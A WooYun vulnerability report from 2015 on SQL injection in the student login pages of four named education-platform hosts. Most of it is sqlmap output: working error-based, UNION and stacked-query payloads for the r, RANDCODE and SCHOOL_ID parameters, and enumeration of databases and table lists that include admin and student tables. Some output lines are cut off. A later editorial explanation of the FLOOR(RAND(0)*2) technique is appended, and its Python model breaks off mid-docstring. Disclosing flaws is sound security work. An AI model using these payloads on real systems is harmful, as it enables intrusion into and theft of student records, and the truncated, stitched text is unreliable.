Defect ID: wooyun-2015-0128159

Title: A set of generic SQL injection vulnerabilities in an education network platform

Vendor: CNCERT (National Internet Emergency Response Center)

Author: qqdaxingxing

Submitted: 2015-07-24 15:00

Fixed: 2015-09-12 09:44

Published: 2015-09-12 09:44

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: handed over to a third-party partner (CNCERT, National Internet Emergency Response Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-07-24: details sent to the vendor, awaiting vendor handling
2015-07-29: vendor confirmed; details disclosed to the vendor only
2015-08-08: details disclosed to core white hats and domain experts
2015-08-18: details disclosed to regular white hats
2015-08-28: details disclosed to intern white hats
2015-09-12: details disclosed to the public

Summary:

The online-learning comprehensive evaluation support platform for the Higher Education Self-Study Examination, technically supported by Huaxia Dadi Education Network (华夏大地教育网), has multiple SQL injection flaws.

Details:

There are four different domains in total, and on some of them different schools are distinguished by different file names under the same domain.

[Four screenshots omitted: 11.png, 1二.png, 1三.png, 1四.png]

So the database pulled down covers all the schools; as a rookie I dumped it for a long time without finishing, so I only list the tables.
The injection links are below:
http://jxilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=6&STUDENT_TYPE=2&RANDCODE=696c
http://hbilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12&STUDENT_TYPE=2&RANDCODE=m3v2
http://ilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=9&STUDENT_TYPE=1&RANDCODE=7zrm
http://hnilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=198&STUDENT_TYPE=1&CREDIT=0&RANDCODE=78f7

Proof of vulnerability:

http://jxilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=6&STUDENT_TYPE=2&RANDCODE=696c
---
Place: GET
Parameter: r
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHER
Payload: r=teach/student/index' AND (SELEC
(0x3a6e69683a,(SELECT (CASE WHEN (2309=2309) T
OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARA
='THrP&
Place: POST
Parameter: RANDCODE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHER
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCR
=2&RANDCODE=696c' AND (SELECT 5078 FROM(SELECT
ECT (CASE WHEN (5078=5078) THEN 1 ELSE 0 END))
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
---
there were multiple injection points, please s
injections:
[0] place: POST, parameter: RANDCODE, type: Si
[1] place: GET, parameter: r, type: Single quo
[q] Quit
>
[16:34:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.9, PHP
back-end DBMS: MySQL 5.0
[16:34:08] [INFO] fetching database names
[16:34:08] [INFO] the SQL query used returns 4
[16:34:08] [INFO] resumed: information_schema
[16:34:08] [INFO] resumed: jxtiger
[16:34:08] [INFO] resumed: test
[16:34:08] [INFO] resumed: tiger2010
available databases [4]:
[*] information_schema
[*] jxtiger
[*] test
[*] tiger2010
[16:34:08] [INFO] fetching tables for database
est, tiger2010'
[16:34:08] [INFO] the SQL query used returns 2
Database: jxtiger
[92 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_jx_fwzx_score |
| edu_jx_stu_newscore |
| edu_kitem_score_his |
| edu_know_item |
| edu_log |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_search_final_score |
| edu_search_final_score_appoint_report |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| sun |
| temp_stu_steptest_score |
+---------------------------------------+
Database: tiger2010
[86 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_kitem_score_his |
| edu_know_item |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| temp_stu_steptest_score |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
[16:34:10] [INFO] fetched data logged to text
tput\jxilearning.edu-edu.com.cn'
===========================================================================
http://hbilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12&STUDENT_TYPE=2&RANDCODE=m3v2
Parameter: r
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: r=teach/student/index' AND (SELECT 5121 FROM(SELECT COUNT(*),CONCAT(0x3a6a636f3a,(SELECT (CASE WHEN (5121=5121) THEN 1 ELSE 0 END)),0x3a7162653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HACE'='HACE&
Place: POST
Parameter: RANDCODE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12&STUDENT_TYPE=2&RANDCODE=m3v2' AND (SELECT 2063 FROM(SELECT COUNT(*),CONCAT(0x3a6a636f3a,(SELECT (CASE WHEN (2063=2063) THEN 1 ELSE 0 END)),0x3a7162653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NqRo'='NqRo
Place: POST
Parameter: SCHOOL_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12 AND (SELECT 8455 FROM(SELECT COUNT(*),CONCAT(0x3a6a636f3a,(SELECT (CASE WHEN (8455=8455) THEN 1 ELSE 0 END)),0x3a7162653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&STUDENT_TYPE=2&RANDCODE=m3v2
Type: UNION query
Title: MySQL UNION query (NULL) - 23 columns
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a6a636f3a,0x54766d70476d48736641,0x3a7162653a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&STUDENT_TYPE=2&RANDCODE=m3v2
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=12; SELECT SLEEP(5)-- &STUDENT_TYPE=2&RANDCODE=m3v2
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: RANDCODE, type: Single quoted string (default)
[1] place: GET, parameter: r, type: Single quoted string
[2] place: POST, parameter: SCHOOL_ID, type: Unescaped numeric
[q] Quit
>
[16:37:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.9, PHP 5.2.9
back-end DBMS: MySQL 5.0
[16:37:29] [INFO] fetching database names
[16:37:29] [INFO] the SQL query used returns 4 entries
[16:37:29] [INFO] resumed: information_schema
[16:37:29] [INFO] resumed: jxtiger
[16:37:29] [INFO] resumed: test
[16:37:29] [INFO] resumed: tiger2010
available databases [4]:
[*] information_schema
[*] jxtiger
[*] test
[*] tiger2010
[16:37:29] [INFO] fetching tables for databases: 'information_schema, jxtiger, test, tiger2010'
[16:37:30] [INFO] the SQL query used returns 215 entries
Database: jxtiger
[92 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_jx_fwzx_score |
| edu_jx_stu_newscore |
| edu_kitem_score_his |
| edu_know_item |
| edu_log |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_search_final_score |
| edu_search_final_score_appoint_report |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| sun |
| temp_stu_steptest_score |
+---------------------------------------+
Database: tiger2010
[86 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_kitem_score_his |
| edu_know_item |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| temp_stu_steptest_score |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
[16:37:31] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\hbilearning.edu-edu.com.cn'
================================================================================
http://ilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=9&STUDENT_TYPE=1&RANDCODE=7zrm
Place: POST
Parameter: RANDCODE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=9&STUDENT_TYPE=1&RANDCODE=7zrm' AND (SELECT 2622 FROM(SELECT COUNT(*),CONCAT(0x3a6f626d3a,(SELECT (CASE WHEN (2622=2622) THEN 1 ELSE 0 END)),0x3a7172683a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nunb'='nunb
Place: GET
Parameter: r
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: r=teach/student/index' AND (SELECT 9249 FROM(SELECT COUNT(*),CONCAT(0x3a6f626d3a,(SELECT (CASE WHEN (9249=9249) THEN 1 ELSE 0 END)),0x3a7172683a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mwKD'='mwKD&
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: RANDCODE, type: Single quoted string (default)
[1] place: GET, parameter: r, type: Single quoted string
[q] Quit
>
[16:43:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.9, PHP 5.2.9
back-end DBMS: MySQL 5.0
[16:43:16] [INFO] fetching database names
[16:43:16] [INFO] the SQL query used returns 4 entries
[16:43:16] [INFO] resumed: information_schema
[16:43:16] [INFO] resumed: test
[16:43:16] [INFO] resumed: tiger2010
[16:43:16] [INFO] resumed: tiger_bak
available databases [4]:
[*] information_schema
[*] test
[*] tiger2010
[*] tiger_bak
[16:43:16] [INFO] fetching tables for databases: 'information_schema, test, tiger2010, tiger_bak'
[16:43:16] [INFO] the SQL query used returns 213 entries
Database: tiger2010
[90 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_cdcard |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_kitem_score_his |
| edu_know_item |
| edu_log |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_search_final_score |
| edu_search_final_score_appoint_report |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| temp_stu_steptest_score |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: tiger_bak
[86 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_kitem_score_his |
| edu_know_item |
| edu_log |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| temp_stu_steptest_score |
+---------------------------------------+
[16:43:17] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\ilearning.edu-edu.com.cn'
================================================================================
http://hnilearning.edu-edu.com.cn/index.php?r=system/login/StuLogin
POST:LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=198&STUDENT_TYPE=1&CREDIT=0&RANDCODE=78f7
---
Place: GET
Parameter: r
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: r=teach/student/index' AND (SELECT 2734 FROM(SELECT COUNT(*),CONCAT(0x3a6e61663a,(SELECT (CASE WHEN (2734=2734) THEN 1 ELSE 0 END)),0x3a6a75703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WOzr'='WOzr&
Place: POST
Parameter: RANDCODE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: LOGIN_NAME=8888&PASSWORD=8888&SCREENW=1366&SCHOOL_ID=198&STUDENT_TYPE=1&CREDIT=0&RANDCODE=78f7' AND (SELECT 4760 FROM(SELECT COUNT(*),CONCAT(0x3a6e61663a,(SELECT (CASE WHEN (4760=4760) THEN 1 ELSE 0 END)),0x3a6a75703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'jJBZ'='jJBZ
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: RANDCODE, type: Single quoted string (default)
[1] place: GET, parameter: r, type: Single quoted string
[q] Quit
>
[16:58:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.9, PHP 5.2.9
back-end DBMS: MySQL 5.0
[16:58:59] [INFO] fetching database names
[16:58:59] [INFO] the SQL query used returns 3 entries
[16:58:59] [INFO] resumed: information_schema
[16:58:59] [INFO] resumed: hnilearn
[16:58:59] [INFO] resumed: test
available databases [3]:
[*] hnilearn
[*] information_schema
[*] test
[16:58:59] [INFO] fetching tables for databases: 'hnilearn, information_schema, test'
[16:58:59] [INFO] the SQL query used returns 128 entries
Database: hnilearn
[91 tables]
+---------------------------------------+
| edu_acc_role_range |
| edu_action |
| edu_admin_menu |
| edu_admin_role |
| edu_autogetschdata_log |
| edu_booking |
| edu_booking_student |
| edu_business_type |
| edu_card |
| edu_class |
| edu_client_log |
| edu_college |
| edu_college_major |
| edu_course |
| edu_course_reminder |
| edu_course_student |
| edu_courseware |
| edu_courseware_time |
| edu_eplan_major |
| edu_eplan_teachpoint |
| edu_eplan_termtest_time |
| edu_eplan_videodata |
| edu_eplan_videogather |
| edu_erule_courseware |
| edu_erule_kitem_test |
| edu_erule_score_rate |
| edu_erule_steptest |
| edu_erule_stu_guide |
| edu_erule_termtest |
| edu_exam_cdcard |
| edu_exam_num |
| edu_exam_plan |
| edu_exam_rule |
| edu_final_score |
| edu_final_serialize_score |
| edu_grade |
| edu_group |
| edu_group_acc_role |
| edu_group_relation |
| edu_group_role |
| edu_group_user |
| edu_kitem_score_his |
| edu_know_item |
| edu_log |
| edu_major |
| edu_major_course |
| edu_notice |
| edu_notice_user |
| edu_offline_item |
| edu_offline_item_score |
| edu_open_changes |
| edu_open_logs |
| edu_open_settings |
| edu_order |
| edu_order_course |
| edu_order_sequence |
| edu_power |
| edu_power_action |
| edu_power_label |
| edu_province |
| edu_province_major |
| edu_remind_return |
| edu_role |
| edu_role_power |
| edu_role_type |
| edu_sch_dept |
| edu_school |
| edu_school_major |
| edu_search_final_score |
| edu_search_final_score_appoint_report |
| edu_society_class |
| edu_step_test |
| edu_steptest_score |
| edu_stest_knowledge |
| edu_stu_class |
| edu_stu_kitem_score |
| edu_stu_steptest |
| edu_student_action_log |
| edu_student_action_type |
| edu_student_history |
| edu_stuinfo_wrong_mark |
| edu_super_admin |
| edu_teach_point |
| edu_temp_stu_info |
| edu_term_test |
| edu_termtest_score |
| edu_test |
| edu_testexport_updatetime |
| edu_user_all |
| edu_user_student |
| temp_stu_steptest_score |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
[16:59:00] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\hnilearning.edu-edu.com.cn'
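
Every error-based payload in the sqlmap output above has the same shape: (SELECT n FROM (SELECT COUNT(*), CONCAT(0x3a..3a, (<subquery>), 0x3a..3a, FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a). It works because MySQL evaluates a non-deterministic GROUP BY key twice for every new group (once to probe its temporary table, once more for the row it inserts), and because RAND(0) is seeded, so FLOOR(RAND(0)*2) yields the fixed sequence 0, 1, 1, 0, 1, 1, ... and the third row is inserted under a key that already exists. The resulting "Duplicate entry ... for key 'group_key'" message echoes the key, and with it whatever the subquery returned between the two hex markers (0x3a6a636f3a is ':jco:', 0x3a7162653a is ':qbe:'). The Python model below is an added editorial example, not part of the original report or of sqlmap: it reimplements MySQL's RAND() from its two-seed recurrence and a simplified temp-table GROUP BY; the 40-row count standing in for INFORMATION_SCHEMA.CHARACTER_SETS and the leaked strings fed to it are assumptions.

```python
"""Model of why the FLOOR(RAND(0)*2) ... GROUP BY payload in this report makes
MySQL raise a duplicate-key error that carries attacker-chosen data.
Added example; the row count and leaked strings are constructed inputs."""

MASK = 0x3FFFFFFF  # MySQL's RAND() state is kept modulo 2^30 - 1


class MySQLRand:
    """Reproduces MySQL's RAND(seed) generator: two 30-bit seeds, the
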